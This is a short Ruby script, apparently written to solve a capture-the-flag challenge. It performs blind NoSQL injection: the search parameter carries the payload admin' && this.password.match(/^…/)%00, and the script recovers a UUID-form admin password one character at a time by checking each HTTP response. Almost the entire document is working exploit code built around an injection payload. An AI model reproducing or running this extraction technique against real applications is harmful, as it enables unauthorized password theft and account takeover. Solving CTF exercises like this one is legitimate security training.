CTF Password Brute Forcer

main.rb

#!/usr/bin/env ruby
#
# This script solves a simple CTF problem in which a password can be gradually
# guessed by iterating through all possible combinations using a regex matcher.
#
# The password takes the form of a UUID.

require 'net/http/persistent'

# Available hexidecimal UUID characters to match.
UUID_CHARS = [*"0".."9"] + [*"a".."f"]

# Create initial array of nils in UUID format.
key = Array.new(8) + %w(-) + Array.new(4) + %w(-) + Array.new(4) + %w(-) + Array.new(4) + %w(-) + Array.new(12)
conn = Net::HTTP::Persistent.new

# Recurse through matchers, return a match charcter when found.
def match(conn, key, matchers)
  matcher = matchers.pop
  uri = URI("http://<domain>/?search=admin'%20%26%26%20this.password.match(/^#{matched(key)}#{matcher}.*$/)%00")

  puts "Trying: #{uri}"
  res = conn.request(uri)

  if res.body.include?("?search=admin")
    return matcher
  else
    match(conn, key, matchers)
  end
end

# Returns a string containing known password characters.
def matched(key)
  i = key.index(nil)
  i.nil? ? key.join : key[0, i].join
end

# Iterate through nil key values and replace them with matches when found.
key.each.with_index do |k, i|
  next unless k.nil?

  key[i] = match(conn, key, UUID_CHARS.clone)
  puts "Matched: #{matched(key)}"
end

puts "==========================="
puts "Key discovered! #{key.join}"
puts "==========================="

conn.shutdown